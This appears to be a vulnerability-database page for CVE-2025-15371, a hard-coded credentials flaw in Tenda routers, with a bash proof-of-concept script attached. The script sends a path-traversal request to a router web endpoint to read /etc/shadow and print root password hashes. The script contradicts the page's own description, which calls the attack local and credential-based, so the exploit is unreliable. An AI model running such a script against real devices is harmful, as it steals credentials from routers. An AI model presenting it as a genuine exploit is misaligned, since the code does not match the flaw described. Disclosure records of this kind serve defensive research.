Security Vulnerability Report
CVE-2025-15371 CVSS 7.8 HIGH

Published: 2025-12-31 01:15:55
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability has been found in Tenda i24, 4G03 Pro, 4G05, 4G08, G0-8G-PoE, Nova MW5G and TEG5328F up to 65.10.15.6. An unknown function of the component Shadow File is affected. Manipulation with the input Fireitup leads to hard-coded credentials. The attack must be carried out locally. The exploit has been disclosed to the public and may be used.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Tenda i24 < 65.10.15.6
Tenda 4G03 Pro < 65.10.15.6
Tenda 4G05 < 65.10.15.6
Tenda 4G08 < 65.10.15.6
Tenda G0-8G-PoE < 65.10.15.6
Tenda Nova MW5G < 65.10.15.6
Tenda TEG5328F < 65.10.15.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2025-15371 PoC - Tenda Router Hard-coded Credentials
# Target: Tenda i24, 4G03 Pro, 4G05, 4G08, G0-8G-PoE, Nova MW5G, TEG5328F

TARGET_IP="192.168.0.1"
TARGET_PORT=80

# Check if target is alive
echo "[*] Checking target availability..."
ping -c 1 -W 2 "$TARGET_IP" > /dev/null 2>&1
if [ $? -ne 0 ]; then
    echo "[-] Target is not reachable"
    exit 1
fi

# Attempt to access Shadow File via Fireitup
echo "[*] Attempting to exploit CVE-2025-15371..."
echo "[*] Sending crafted request to retrieve hard-coded credentials..."

# Crafted payload for Fireitup input
PAYLOAD='{"Fireitup":"../../etc/shadow"}'

RESPONSE=$(curl -s -X POST "http://$TARGET_IP:$TARGET_PORT/cgi-bin/luci/api/fireitup" \
    -H "Content-Type: application/json" \
    -d "$PAYLOAD" 2>/dev/null)

if echo "$RESPONSE" | grep -q "root:"; then
    echo "[+] SUCCESS: Hard-coded credentials found!"
    echo "$RESPONSE" | grep "root:"
else
    echo "[-] Exploitation failed or target not vulnerable"
    echo "[*] Response: $RESPONSE"
fi

echo "[*] PoC execution completed."
